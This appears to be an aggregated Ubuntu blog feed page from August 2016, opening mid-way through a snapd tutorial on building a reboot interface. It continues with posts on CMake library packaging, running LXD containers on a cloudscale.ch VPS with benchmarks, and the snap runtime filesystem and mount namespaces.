@@ -60,6 +60,7 @@ var implicitClassicSlots = []string{
"pulseaudio",
"unity7",
"x11",
+ "hello",
}

// AddImplicitSlots adds implicitly defined slots to a given snap.
diff --git a/snap/implicit_test.go b/snap/implicit_test.go
index e9c4b07..364a6ef 100644
--- a/snap/implicit_test.go
+++ b/snap/implicit_test.go
@@ -56,7 +56,7 @@ func (s *InfoSnapYamlTestSuite) TestAddImplicitSlotsOnClassic(c *C) {
c.Assert(info.Slots["unity7"].Interface, Equals, "unity7")
c.Assert(info.Slots["unity7"].Name, Equals, "unity7")
c.Assert(info.Slots["unity7"].Snap, Equals, info)
- c.Assert(info.Slots, HasLen, 29)
+ c.Assert(info.Slots, HasLen, 30)
}

func (s *InfoSnapYamlTestSuite) TestImplicitSlotsAreRealInterfaces(c *C) {


Now let's see what we have. You should have three patches:
  1. The first one adding the dummy hello interface
  2. The second one registering it with allInterfaces
  3. The third one adding it to implicit slots on the core snap, on classic

This is how it looked for me. You can also see the particular commit message style I was using. All the commits are prefixed with the directory where the changes were made, followed by a colon and the summary of the change. Normally I would also add longer descriptions but here this is not required as the changes are trivial.




Seeing our interface for the first time


Let's run our changed code with devtools. Switch to the devtools directory and run:
./refresh-bits snapd setup run-snapd restore

This roughly means:
  1. Build snapd from source (based on correctly set $GOPATH)
  2. Prepare for running locally built snapd
  3. Run locally built snapd
  4. Restore regular version of snapd

The script will prompt you for your password. This is required to perform the system-wide operations. It will also block and wait until you interrupt it by pressing control-c. Please don't do this yet though, we want to check if our changes really made it through.




To check this we can simply list the available interfaces with

sudo snap interfaces | grep hello

Why sudo? Because of a peculiarity of how refresh-bits works. Normally it is not required. Did it work? It did for me:



TIP: If it didn't work for you and you didn't get the hello interface then the most likely cause of the issue is that you were editing your own fork but refresh-bits still built the vanilla upstream version that is checked out somewhere else.

Go to $GOPATH/src/github.com/snapcore/snapd and ensure that this is indeed the fork you were expecting. If not just remove this directory and move your fork (that you may have cloned elsewhere) here and try again.


Great. Now we are in business. Let's recap what we did so far:
  • We added a whole new interface by dropping boilerplate code into interfaces/builtin/hello.go
  • We registered the interface in the list of allInterfaces
  • We made snapd inject an implicit (internally defined) slot on the core snap when running on classic
  • We used refresh-bits to run our locally built version and confirmed it really works

Granting permissions through interfaces


With the scaffolding in place we can now work on using our new interface to actually grant additional permissions. When designing real interfaces you have to think about what kind of action should grant extra permissions. Recall from part [3] that you can freely associate extra security snippets that encapsulate permissions – either permanent or connection-based – with both plugs and slots.

A permanent snippet is always there as long as a plug or a slot exists. Typically this is used on snaps other than the core snap (e.g. a service provider that is packaged as a snap) to allow the service to run. Examples of such services could include network-manager, modem-manager, docker, lxd, x11 and anything like that. The granted permissions allow the service to operate as well as to create a communication channel (typically a socket or a DBus bus name) that clients can connect to.

A connection-based snippet is only applied when an interface connection is made. This permission is given to the client and typically involves basic IPC system calls as well as permission to open a given socket (e.g. the X11 socket) or use specific DBus methods and objects.

A special class of connection snippets exists for things that don't involve a client application talking to a server application but rather a program using given kernel services. The prime example of this use case is the network interface, which grants access to several network system calls. This interface grants nothing to the slot, just to connected plugs.

Today we will explore that last case. Our hello interface will give us access to a system call that is usually forbidden: reboot.

The graceful-reboot snap


For the purpose of this exercise I wrote a tiny C program that uses the reboot() function. The whole program is reproduced below, along with appropriate build support for snapcraft.

graceful-reboot.c


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/reboot.h>
#include <linux/reboot.h>
#include <errno.h>

int main() {
	sync();
	if (reboot(LINUX_REBOOT_CMD_RESTART) != 0) {
		switch (errno) {
		case EPERM:
			printf("Insufficient permissions to reboot the system\n");
			break;
		default:
			perror("reboot()");
			break;
		}
		return EXIT_FAILURE;
	}
	printf("Reboot requested\n");
	return EXIT_SUCCESS;
}

Makefile


TIP: Makefiles rely on differences between tabs and spaces. When copy pasting this sample you need to ensure that tabs are preserved in the clean and install rules

CFLAGS += -Wall
.PHONY: all
all: graceful-reboot
.PHONY: clean
clean:
	rm -f graceful-reboot
graceful-reboot: graceful-reboot.c
.PHONY: install
install: graceful-reboot
	install -d $(DESTDIR)/usr/bin
	install -m 0755 graceful-reboot $(DESTDIR)/usr/bin/graceful-reboot

snapcraft.yaml


name: graceful-reboot
version: 1
summary: Reboots the system gracefully
description: |
  This snap contains a graceful-reboot application that requests the system
  to reboot by talking to the init daemon. The application uses a custom
  "hello" interface that is developed as a part of a tutorial.
confinement: strict
apps:
  graceful-reboot:
    command: graceful-reboot
    plugs: [hello]
parts:
  main:
    plugin: make
    source: .

We now have everything required. Now let's use snapcraft to build this code and get our snap ready. I'd like to point out that we use confinement: strict. This tells snapcraft and snapd that we really really don't want to run this snap in devmode where all sandboxing is off. Doing so would defeat the purpose of adding the new interface.

Let's install the snap and try it out:

$ snapcraft

$ sudo snap install ./graceful-reboot_1_amd64.snap

Ready? Let's run the command now (don't worry, it won't reboot)

$ graceful-reboot
Bad system call

Aha! That's what we are here to fix. As we know from part [4], seccomp, which is a part of the sandbox system, blocks all system calls that are not explicitly allowed. We can check the system log to see what the actual error message was and figure out which system call needs to be added.

Looking through journalctl -n 100 (last 100 messages) I found this:

sie 10 09:47:02 x200t audit[13864]: SECCOMP auid=1000 uid=1000 gid=1000 ses=2 pid=13864 comm="graceful-reboot" exe="/snap/graceful-reboot/x1/usr/bin/graceful-reboot" sig=31 arch=c000003e syscall=169 compat=0 ip=0x7f7ef30dcfd6 code=0x0

Decoding this rather cryptic message is actually pretty easy. The key fact we are after is the system call number. Here it is 169. Which symbolic system call is that? We can use the scmp_sys_resolver program to find out.

$ scmp_sys_resolver 169
reboot

Bingo. While this case was pretty obvious, library functions don't always map to system call names directly. There are often cases where system calls evolve to gain additional arguments, flags and what not and the name of the library function is not changed.

Adjusting the hello^Hreboot interface


At this stage we can iterate on our interface. We have a test case (the snap we just wrote), we have the means to change the code (editing the hello.go file) and to make it live in the system (the refresh-bits command).

Let's patch our interface to be a little bit more meaningful now. We will rename it from hello to reboot. This will affect the file name, the type name and the string returned from Name(). We will also grant a connected plug permission, through the seccomp security backend, to use the reboot system call. You can try to make the necessary changes yourself but I provide the essential part of the patch below. The key thing to keep in mind is that the ConnectedPlugSnippet method must return, when asked about SecuritySecComp, the name of the system call to allow, like this: []byte(`reboot`).

diff --git a/interfaces/builtin/reboot.go b/interfaces/builtin/reboot.go
index 91962e1..ba7a9e3 100644
--- a/interfaces/builtin/reboot.go
+++ b/interfaces/builtin/reboot.go
@@ -91,7 +91,7 @@ func (iface *RebootInterface) PermanentSlotSnippet(slot *interfaces.Slot, securi
func (iface *RebootInterface) ConnectedPlugSnippet(plug *interfaces.Plug, slot *interfaces.Slot, securitySystem interfaces.SecuritySystem) ([]byte, error) {
switch securitySystem {
case interfaces.SecurityAppArmor:
return nil, nil
case interfaces.SecuritySecComp:
-               return nil, nil
+ return []byte(`reboot`), nil
case interfaces.SecurityDBus:

We can now return to the terminal that had refresh-bits running, interrupt the running command with control-c and simply re-start the whole command again. This will build the updated copy of snapd.

Sure enough, if we now ask snap about known interfaces we will see the reboot interface.

Let's now update the graceful-reboot snap to talk about the reboot interface and re-install it (note that you don't have to change the version string at all, just re-install the rebuilt snap). If we ask snapd about interfaces now we will see that the core snap exposes the reboot slot and the graceful-reboot snap has a reboot plug but they are disconnected.



Let's connect them now.

sudo snap connect graceful-reboot:reboot ubuntu-core:reboot

Let's ensure that it worked by running the interfaces command again:

$ sudo snap interfaces | grep reboot
:reboot              graceful-reboot

Success!

Now before we give it a try, let's have a look at the generated seccomp profile. The profile is derived from the base seccomp template that is a part of the snapd source code and the set of plugs, slots and connections made to or from this snap. Each application of each snap gets a profile; we can see that for ourselves by looking at
/var/lib/snapd/seccomp/profiles/snap.graceful-reboot.graceful-reboot

$ grep reboot /var/lib/snapd/seccomp/profiles/snap.graceful-reboot.graceful-reboot
reboot

There are a few gotchas that we should point out though:

  • Security profiles are derived from interfaces but are only changed when a new connection is made (and that connection affects a particular snap), when the snap is initially installed or every time it is updated.
  • In practice we will either disconnect / reconnect the hello interface or reinstall the snap (whichever is more convenient)
  • Snapd remembers connections that were made explicitly and will re-establish them across snap updates. If you rename an interface while working on it, snapd may print a message (to system log, not to the console) about being unable to reconnect the "hello" interface because that interface no longer exists in snapd. To make snapd forget all those connections simply remove and reinstall the affected snap.
  • You can experiment by editing seccomp profiles directly. Just edit the file mentioned above and add additional system calls. Once you are happy with the result you can adjust snapd source code to match.
  • You can also do that with apparmor profiles but you have to re-load the profile into the kernel each time using the command apparmor_parser -r /path/to/the/profile

Okay, so did it work? Let's try the graceful-reboot command again.

$ graceful-reboot
Insufficient permissions to reboot the system

The process didn't get killed straight away but the reboot call didn't work yet either. Let's look at the system log and see if there are any hints.

sie 10 10:25:55 x200t kernel: audit: type=1400 audit(1470817555.936:47): apparmor="DENIED" operation="capable" profile="snap.graceful-reboot.graceful-reboot" pid=14867 comm="graceful-reboot" capability=22  capname="sys_boot"

This time we could use the system call but apparmor stepped in and said that we need the sys_boot capability. Let's modify the interface to allow that then. The precise apparmor syntax for this is "capability sys_boot,". You absolutely have to include the trailing comma. It was my most common mistake when hacking on apparmor profiles.

Let's patch the interface and re-run refresh-bits and re-install the snap. You can see the patch I applied below

diff --git a/interfaces/builtin/reboot.go b/interfaces/builtin/reboot.go
index 91962e1..ba7a9e3 100644
--- a/interfaces/builtin/reboot.go
+++ b/interfaces/builtin/reboot.go
@@ -91,7 +91,7 @@ func (iface *RebootInterface) PermanentSlotSnippet(slot *interfaces.Slot, securi
func (iface *RebootInterface) ConnectedPlugSnippet(plug *interfaces.Plug, slot *interfaces.Slot, securitySystem interfaces.SecuritySystem) ([]byte, error) {
switch securitySystem {
case interfaces.SecurityAppArmor:
- return nil, nil
+ return []byte(`capability sys_boot,`), nil
case interfaces.SecuritySecComp:
return []byte(`reboot`), nil
case interfaces.SecurityDBus:

TIP: I'm using sudo with a full path because of a bug in sudo where /snap/bin is not kept on the path.

Warning: the next command will reboot your system straight away!

$ sudo /snap/bin/graceful-reboot

Final touches


Since interfaces like this are very common, snapd has some support for writing less repetitive code. An exactly identical interface can be written with just this short snippet:

// NewRebootInterface returns a new "reboot" interface.
func NewRebootInterface() interfaces.Interface {
	return &commonInterface{
		name:                  "reboot",
		connectedPlugAppArmor: `capability sys_boot,`,
		connectedPlugSecComp:  `reboot`,
		reservedForOS:         true,
	}
}

Everywhere where we used to say &RebootInterface{} we can now say NewRebootInterface(). The abbreviation helps in code reviews and in just conveying the meaning and intent of the interface.

You can find the source code of this interface in my github repository. The code of the graceful reboot snap is here. Feel free to comment below, or on Google+ or ask me questions directly.
on August 10, 2016 10:04 AM

August 09, 2016

Using a C++ library, particularly a 3rd party one, can be a complicated affair. Library binaries compiled on Windows/OSX/Linux cannot simply be copied over to another platform and used there. Linking works differently, compilers bundle different code into binaries on each platform etc.

This is not an insurmountable problem. Libraries like Qt distribute dynamically compiled binaries for major platforms and other libraries have comparable solutions.

There is a category of libraries which considers the portable binaries issue to be a terminal one. Boost is a widespread source of many ‘header only’ libraries, which don’t require a user to link to a particular platform-compatible library binary. There are also many other examples of such ‘header only’ libraries.

Recently there was a blog post describing an example library which can be built as a shared library, or as a static library, or used directly as a ‘header only’ library which doesn’t require the user to link against anything to use the library. The claim is that it is useful for libraries to provide users the option of using a library as a ‘header only’ library and adding preprocessor magic to make that possible.

However, there is yet a fourth option, and that is for the consumer to compile the source files of the library themselves. This has the advantage that the .cpp file is not #included into every compilation unit, but still avoids the platform-specific library binary.

I decided to write a CMake buildsystem which would achieve all of that for a library. I don’t have an opinion on whether it is a good idea in general for libraries to do things like this, but if people want to do it, it should be as easy as possible.

Additionally, of course, the CMake GenerateExportHeader module should be used, but I didn’t want to change the source from Vittorio so much.
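
For reference, wiring that module in would look roughly like this (a sketch against the targets defined below; the macro and header names are assumptions, not part of the original example):

include(GenerateExportHeader)
# Generates example_lib_export.h with an EXAMPLE_LIB_API macro that expands
# to the right dllexport/dllimport/visibility attributes per platform.
generate_export_header(library_shared
  BASE_NAME example_lib
  EXPORT_MACRO_NAME EXAMPLE_LIB_API
)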

The CMake code below compiles the library in several ways and installs it to a prefix which is suitable for packaging:

cmake_minimum_required(VERSION 3.3)

project(example_lib)

# define the library

set(library_srcs
    example_lib/library/module0/module0.cpp
    example_lib/library/module1/module1.cpp
)

add_library(library_static STATIC ${library_srcs})
add_library(library_shared SHARED ${library_srcs})

add_library(library_iface INTERFACE)
target_compile_definitions(library_iface
    INTERFACE LIBRARY_HEADER_ONLY
)

set(installed_srcs
    include/example_lib/library/module0/module0.cpp
    include/example_lib/library/module1/module1.cpp
)
add_library(library_srcs INTERFACE)
target_sources(library_srcs INTERFACE
    $<INSTALL_INTERFACE:${installed_srcs}>
)

# install and export the library

install(DIRECTORY
    example_lib/library
  DESTINATION
    include/example_lib
)
install(FILES
    example_lib/library.hpp
    example_lib/api.hpp
  DESTINATION
    include/example_lib
)
install(TARGETS
    library_static
    library_shared
    library_iface
    library_srcs
  EXPORT library_targets
  RUNTIME DESTINATION bin
  ARCHIVE DESTINATION lib
  LIBRARY DESTINATION lib
  INCLUDES DESTINATION include
)
install(EXPORT library_targets
  NAMESPACE example_lib::
  DESTINATION lib/cmake/example_lib
)

install(FILES example_lib-config.cmake
  DESTINATION lib/cmake/example_lib
)

This blog post is not a CMake introduction, so to see what all of those commands are about start with the cmake-buildsystem and cmake-packages documentation.

There are 4 add_library calls. The first two serve the purpose of building the library as a shared library and then as a static library.

The next two are INTERFACE libraries, a concept I introduced in CMake 3.0 when it looked like Boost might use CMake. The INTERFACE target can be used to specify header-only libraries because they specify usage requirements for consumers to use, such as include directories and compile definitions.

The library_iface library functions as described in the blog post from Vittorio, in that users of that library will be built with LIBRARY_HEADER_ONLY and will therefore #include the .cpp files.

The library_srcs library causes the consumer to compile the .cpp files separately.

A consumer of a library like this would then look like:

cmake_minimum_required(VERSION 3.3)

project(example_user)

find_package(example_lib REQUIRED)

add_executable(myexe
    src/src0.cpp
    src/src1.cpp
    src/main.cpp
)

## uncomment only one of these!
# target_link_libraries(myexe 
#     example_lib::library_static)
# target_link_libraries(myexe
#     example_lib::library_shared)
# target_link_libraries(myexe
#     example_lib::library_iface)
target_link_libraries(myexe
     example_lib::library_srcs)

So, it is up to the consumer how they consume the library, and they determine that by using target_link_libraries to specify which one they depend on.


on August 09, 2016 08:00 PM

In previous posts, we saw how to configure LXD/LXC containers on a VPS on DigitalOcean and Scaleway. There are many more VPS companies.

cloudscale.ch is one more company that provides Virtual Private Servers (VPS). They are based in Switzerland.

In this post we are going to see how to create a VPS on cloudscale.ch and configure to use LXD/LXC containers.

We now use the term LXD/LXC containers (instead of LXC containers, as in previous articles) in order to show that LXD is a management service for LXC containers; LXD works on top of LXC. This is somewhat similar to GNU/Linux, where GNU software runs on top of the Linux kernel.

Set up the VPS

cloudscale1

We are creating a VPS called myubuntuserver, using the Flex-2 Compute Flavor. This is the most affordable, at 2GB RAM with 1 vCPU core. It costs 1 CHF per day, which is about 0.92€ (or US$1).

The default capacity is 10GB, which is included in the 1 CHF per day. If you want more capacity, there is an extra charge.

cloudscale2

We are installing Ubuntu 16.04 and accepting the rest of the default settings. Currently, there is only one server location, at Rümlang, near Zurich (the largest city in Switzerland).

cloudscale4

Here is the summary of the freshly launched VPS server. The IP address is shown as well.

Connect and update the VPS

In order to connect, we need to SSH to that IP address using the fixed username ubuntu. There is the option of either password authentication or public-key authentication. Let’s connect.

myusername@mycomputer:~$ ssh ubuntu@5.102.145.245
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-24-generic x86_64)

* Documentation: https://help.ubuntu.com/

Get cloud support with Ubuntu Advantage Cloud Guest:
 http://www.ubuntu.com/business/services/cloud

0 packages can be updated.
0 updates are security updates.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

ubuntu@myubuntuserver:~$

Let’s update the package list,

ubuntu@myubuntuserver:~$ sudo apt update
Hit:1 http://ch.archive.ubuntu.com/ubuntu xenial InRelease
Get:2 http://ch.archive.ubuntu.com/ubuntu xenial-updates InRelease [95.7 kB]
...
Get:31 http://security.ubuntu.com/ubuntu xenial-security/multiverse amd64 Packages [1176 B]
Fetched 10.5 MB in 2s (4707 kB/s) 
Reading package lists... Done
Building dependency tree 
Reading state information... Done
67 packages can be upgraded. Run 'apt list --upgradable' to see them.
ubuntu@myubuntuserver:~$ sudo apt upgrade
Reading package lists... Done
Building dependency tree 
...
Processing triggers for libc-bin (2.23-0ubuntu3) ...
ubuntu@myubuntuserver:~$

In this case, we updated 67 packages, among which was lxd. It was important to perform the upgrade of packages.

Configure LXD/LXC

Let’s see how much free disk space is there,

ubuntu@myubuntuserver:~$ df -h /
Filesystem Size Used Avail Use% Mounted on
/dev/vda1  9.7G 1.2G  8.6G 12%  /
ubuntu@myubuntuserver:~$

There is 8.6GB of free space; let’s allocate 5GB of that to the ZFS pool. First, we need to install the package zfsutils-linux. Then, initialize lxd.

ubuntu@myubuntuserver:~$ sudo apt install zfsutils-linux
Reading package lists... Done
...
Processing triggers for ureadahead (0.100.0-19) ...
ubuntu@myubuntuserver:~$ sudo lxd init
Name of the storage backend to use (dir or zfs): zfs
Create a new ZFS pool (yes/no)? yes
Name of the new ZFS pool: myzfspool
Would you like to use an existing block device (yes/no)? no
Size in GB of the new loop device (1GB minimum): 5
Would you like LXD to be available over the network (yes/no)? no
Do you want to configure the LXD bridge (yes/no)? yes
...accept the network autoconfiguration settings that you will be asked...
LXD has been successfully configured.
ubuntu@myubuntuserver:~$

That’s it! We are good to go and configure our first LXD/LXC container.

Testing a container as a Web server

Let’s test LXD/LXC by creating a container, installing nginx and accessing it remotely.

ubuntu@myubuntuserver:~$ lxc launch ubuntu:x web
Creating web
Retrieving image: 100%
Starting web
ubuntu@myubuntuserver:~$

We launched a container called web.

Let’s connect to the container, update the package list and upgrade any available packages.

ubuntu@myubuntuserver:~$ lxc exec web -- /bin/bash
root@web:~# apt update
Hit:1 http://archive.ubuntu.com/ubuntu xenial InRelease
...
9 packages can be upgraded. Run 'apt list --upgradable' to see them.
root@web:~# apt upgrade
Reading package lists... Done
...
Processing triggers for initramfs-tools (0.122ubuntu8.1) ...
root@web:~#

Still inside the container, we install nginx.

root@web:~# apt install nginx
Reading package lists... Done
...
Processing triggers for ufw (0.35-0ubuntu2) ...
root@web:~#

Let’s make a small change in the default index.html,

root@web:/var/www/html# diff -u /var/www/html/index.nginx-debian.html.ORIGINAL /var/www/html/index.nginx-debian.html
--- /var/www/html/index.nginx-debian.html.ORIGINAL 2016-08-09 17:08:16.450844570 +0000
+++ /var/www/html/index.nginx-debian.html 2016-08-09 17:08:45.543247231 +0000
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html>
 <head>
-<title>Welcome to nginx!</title>
+<title>Welcome to nginx on an LXD/LXC container on Ubuntu at cloudscale.ch!</title>
 <style>
 body {
 width: 35em;
@@ -11,7 +11,7 @@
 </style>
 </head>
 <body>
-<h1>Welcome to nginx!</h1>
+<h1>Welcome to nginx on an LXD/LXC container on Ubuntu at cloudscale.ch!</h1>
 <p>If you see this page, the nginx web server is successfully installed and
 working. Further configuration is required.</p>
 
root@web:/var/www/html#

Finally, let’s add a quick and dirty iptables rule to make the container accessible from the Internet.

root@web:/var/www/html# exit
ubuntu@myubuntuserver:~$ lxc list
+------+---------+---------------------+------+------------+-----------+
| NAME | STATE   | IPV4                | IPV6 | TYPE       | SNAPSHOTS |
+------+---------+---------------------+------+------------+-----------+
| web  | RUNNING | 10.5.242.156 (eth0) |      | PERSISTENT | 0         |
+------+---------+---------------------+------+------------+-----------+
ubuntu@myubuntuserver:~$ ifconfig ens3
ens3 Link encap:Ethernet HWaddr fa:16:3e:ad:dc:2c 
 inet addr:5.102.145.245 Bcast:5.102.145.255 Mask:255.255.255.0
 inet6 addr: fe80::f816:3eff:fead:dc2c/64 Scope:Link
 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
 RX packets:102934 errors:0 dropped:0 overruns:0 frame:0
 TX packets:35613 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000 
 RX bytes:291995591 (291.9 MB) TX bytes:3265570 (3.2 MB)

ubuntu@myubuntuserver:~$

Therefore, the iptables command that will allow access to the container is,

ubuntu@myubuntuserver:~$ sudo iptables -t nat -I PREROUTING -i ens3 -p TCP -d 5.102.145.245/32 --dport 80 -j DNAT --to-destination 10.5.242.156:80
ubuntu@myubuntuserver:~$

Here is the result when we visit the new Web server from our computer,

cloudscale-nginx

Benchmarks

We are benchmarking the CPU, the memory and the disk. Note that our VPS has a single vCPU.

CPU

We are benchmarking the CPU using sysbench with the following parameters.

ubuntu@myubuntuserver:~$ sysbench --num-threads=1 --test=cpu run
sysbench 0.4.12: multi-threaded system evaluation benchmark

Running the test with following options:
Number of threads: 1

Doing CPU performance benchmark

Threads started!
Done.

Maximum prime number checked in CPU test: 10000


Test execution summary:
 total time: 10.9448s
 total number of events: 10000
 total time taken by event execution: 10.9429
 per-request statistics:
 min: 0.96ms
 avg: 1.09ms
 max: 2.79ms
 approx. 95 percentile: 1.27ms

Threads fairness:
 events (avg/stddev): 10000.0000/0.00
 execution time (avg/stddev): 10.9429/0.00

ubuntu@myubuntuserver:~$

The total time for the CPU benchmark with one thread was 10.94s. With two threads, it was 10.23s. With four threads, it was 10.07s.

Memory

We are benchmarking the memory using sysbench with the following parameters.

ubuntu@myubuntuserver:~$ sysbench --num-threads=1 --test=memory run
sysbench 0.4.12: multi-threaded system evaluation benchmark

Running the test with following options:
Number of threads: 1

Doing memory operations speed test
Memory block size: 1K

Memory transfer size: 102400M

Memory operations type: write
Memory scope type: global
Threads started!
Done.

Operations performed: 104857600 (1768217.45 ops/sec)

102400.00 MB transferred (1726.77 MB/sec)


Test execution summary:
 total time: 59.3013s
 total number of events: 104857600
 total time taken by event execution: 47.2179
 per-request statistics:
 min: 0.00ms
 avg: 0.00ms
 max: 0.80ms
 approx. 95 percentile: 0.00ms

Threads fairness:
 events (avg/stddev): 104857600.0000/0.00
 execution time (avg/stddev): 47.2179/0.00

ubuntu@myubuntuserver:~$

The total time for the memory benchmark with one thread was 59.30s. With two threads, it was 62.17s. With four threads, it was 62.57s.

Disk

We are benchmarking the disk using dd with the following parameters.

ubuntu@myubuntuserver:~$ dd if=/dev/zero of=testfile bs=1M count=1024 oflag=dsync
1024+0 records in
1024+0 records out
1073741824 bytes (1,1 GB, 1,0 GiB) copied, 21,1995 s, 50,6 MB/s
ubuntu@myubuntuserver:~$

 

 

It took about 21 seconds to write 1024 blocks of 1MB each (a 1GB file in total) with the DSYNC flag. The throughput was 50.6MB/s. Subsequent invocations were around 50MB/s as well.

ZFS pool free space

Here is the free space in the ZFS pool after one container, the one with nginx installed and packages updated,

ubuntu@myubuntuserver:~$ sudo zpool list
NAME       SIZE ALLOC  FREE EXPANDSZ FRAG CAP DEDUP HEALTH ALTROOT
myzfspool 4,97G  811M 4,18G        -  11% 15% 1.00x ONLINE       -
ubuntu@myubuntuserver:~$

Again, after a second container (new and empty) was created,

ubuntu@myubuntuserver:~$ sudo zpool list
NAME       SIZE ALLOC  FREE EXPANDSZ FRAG CAP DEDUP HEALTH ALTROOT
myzfspool 4,97G  822M 4,17G        -  11% 16% 1.00x ONLINE       -
ubuntu@myubuntuserver:~$

Thanks to copy-on-write with ZFS, the new containers do not take up much space. Only the files that are added or updated contribute additional space.

Conclusion

We saw how to launch an Ubuntu 16.04 VPS on cloudscale.ch, then configure LXD.

We created a container with nginx, and configured iptables so that the Web server is accessible from the Internet.

Finally, we saw some benchmarks for the vCPU, the memory and the disk.

on August 09, 2016 05:26 PM

I hope you'll enjoy a shiny new 6-part blog series I recently published at Linux.com.
  1. The first article is a bit of back story, perhaps a behind-the-scenes look at the motivations, timelines, and some of the work performed between Microsoft and Canonical to bring Ubuntu to Windows.
  2. The second article is an updated getting-started guide, with screenshots, showing a Windows 10 user exactly how to enable and run Ubuntu on Windows.
  3. The third article walks through a dozen or so examples of the most essential command line utilities a Windows user, new to Ubuntu (and Bash), should absolutely learn.
  4. The fourth article shows how to write and execute your first script, "Howdy, Windows!", in 6 different dynamic scripting languages (Bash, Python, Perl, Ruby, PHP, and NodeJS).
  5. The fifth article demonstrates how to write, compile, and execute your first program in 7 different compiled programming languages (C, C++, Fortran, Golang).
  6. The sixth and final article conducts some performance benchmarks of the CPU, Memory, Disk, and Network, in both native Ubuntu on a physical machine, and Ubuntu on Windows running on the same system.
I really enjoyed writing these.  Hopefully you'll try some of the examples, and share your experiences using Ubuntu native utilities on a Windows desktop.  You can find the source code of the programming examples in Github and Launchpad:
Cheers,
Dustin
on August 09, 2016 01:26 PM

Welcome to the Ubuntu Weekly Newsletter. This is issue #477 for the week August 1 – 7, 2016, and the full version is available here.

In this issue we cover:

The issue of The Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Simon Quigley
  • Chris Guiver
  • Athul Muralidhar
  • Chris Sirrs
  • Aaron Honeycutt
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution 3.0 License BY SA Creative Commons License

on August 09, 2016 02:42 AM

August 08, 2016

Snap execution environment

Zygmunt Krynicki


This is the fourth article in the series about snappy interfaces. You can check out articles one, two and three though they are not directly required.

In this installment we will explore the layout and properties of the file system at the time snap application is executed. From the point of view of the user nothing special is happening. The user either runs an application by clicking on a desktop icon or by running a shell command. Internally, snapd uses a series of steps (which I will not explain today as they are largely an implementation detail) to configure the application process.

The (ch)root filesystem and a bit of magic


Let’s start with the most important fact: the root filesystem is not the filesystem of the host distribution. Using the host filesystem would lead to lots of inconsistencies. Those are rather obvious: different base libraries, potentially different filesystem layout, etc. At snap application runtime the root filesystem is changed to the core snap itself. You can think of this as a kind of chroot. Obviously the chroot itself would be insufficient as snaps are read only filesystems and the core snap is no different.

Certain directories in the core snap are bind mounted (you can think of this as a special type of a symbolic link or a hard link to a directory though neither are fully accurate) to locations on the host file system. This includes the /home directory, the /run directory and a few others (see Appendix A for the full list). Notably this does not include the /usr/lib or /usr/bin. If a snap needs a library or an executable to function, that library or executable has to be present in the snap itself. The only exception to that are very low level libraries like libc that are present in the core snap.

TIP: explore the core snap to see what is there. Having installed at least one snap you can go to /snap/ubuntu-core/current to see the list of files provided there.

With all those mounts and chroots in place, one might wonder what mounts look like for all the other processes in the system. The answer is simple: they look as if nothing special related to snappy was happening.

To understand the answer you have to know a little about Linux namespaces. Namespaces are a way to create a separate view of a given aspect of a Linux system at a per-process level. Unlike full-blown virtual machines (where you run a whole emulated computer with a potentially different operating system kernel and emulated peripheral devices), namespaces are fine grained. Snappy uses just one of the available namespaces, the mount namespace. Now I won’t fool you: while the idea seems simple – mounts in the namespace are isolated from the mounts outside of the namespace – the reality is far more complex because of the so-called shared subtrees. One interesting consequence is that mounts performed after a snap application is started (e.g. in the /media directory) are visible to the said application (e.g. to VLC) while the reverse is not true. If a malicious snap tries (and manages, despite various defenses put in place) to mount something in, say, /usr/, that change will be visible only to the snap application process.

Don’t worry if you don’t fully understand this topic. The main point is that your application sees a different view of the filesystem but that view is consistent across distributions.

TIP: you may have seen the core snap as it looks like on disk if you followed the earlier tip. Now see the real file system at runtime! Install the snapd-hacker-toolbelt snap and run snapd-hacker-toolbelt.busybox sh. This will give you a shell with many of the familiar commands that let you peek and poke at the environment.
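
A few quick commands inside that shell make the runtime view tangible (a sketch; it assumes the busybox build includes the usual applets, which it does at the time of writing):

ls /                     # the root filesystem here is the core snap, not your host's root
mount | grep squashfs    # the read-only core and snap filesystems
df -h /tmp               # /tmp is a private tmpfs (more on that in the list below)
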
Now there are a few more tweaks I should point out, though I won’t go into them in too much detail:


  • Each process gets a private /tmp directory with a fresh tmpfs mounted there (see the short sketch after this list). This is a security measure. One simple consequence is that you cannot expect to share files by dropping them there; another is that you cannot create arbitrarily large files there, since tmpfs is backed by a fraction of the available system memory.
  • There’s also a private instance of the /dev/pts directory with pseudo-terminal devices. This is another security measure. In practice you will not care about this much; it’s just a part of the Linux plumbing that has to be set up in a given way.
  • The whole host filesystem is mounted at /var/lib/snapd/hostfs. This can be used by interfaces similar to the content sharing interface, for example. This is super interesting and we will devote a whole article to using this later on.
  • There’s special code that exists to support Nvidia proprietary drivers. I will discuss this with a separate installment that may be of interest to game developers.
  • The current working directory may be impossible to preserve across all the chroot, mount and bind-mount magic. The easiest way to experience this is to create a directory in /tmp (e.g. /tmp/foo) and try to run any snap command from there. Because of the private (and empty) /tmp directory, /tmp/foo does not exist for the snap application process. Snap-confine will print an informative error message and refuse to run (this is also shown in the sketch below).
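
To see the private /tmp (and the working-directory issue) in action, here is a small sketch using the snapd-hacker-toolbelt snap from the earlier tip:

touch /tmp/host-file
snapd-hacker-toolbelt.busybox ls /tmp     # empty: the snap sees its own private tmpfs, not host-file
mkdir -p /tmp/foo && cd /tmp/foo
snapd-hacker-toolbelt.busybox ls          # snap-confine refuses to run: /tmp/foo does not exist in the snap's view
cd ~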

This is now a much more comfortable environment. Many of the usual places exist and contain the data the applications are familiar with. This doesn’t mean those directories are readable or writable to the application process; they are just present. Confinement and interfaces decide if something is readable or writable. This brings us to the second big part of snap-confine.

Process confinement

Snap-confine (as of version 1.0.39) supports two sandboxing technologies: seccomp and apparmor.

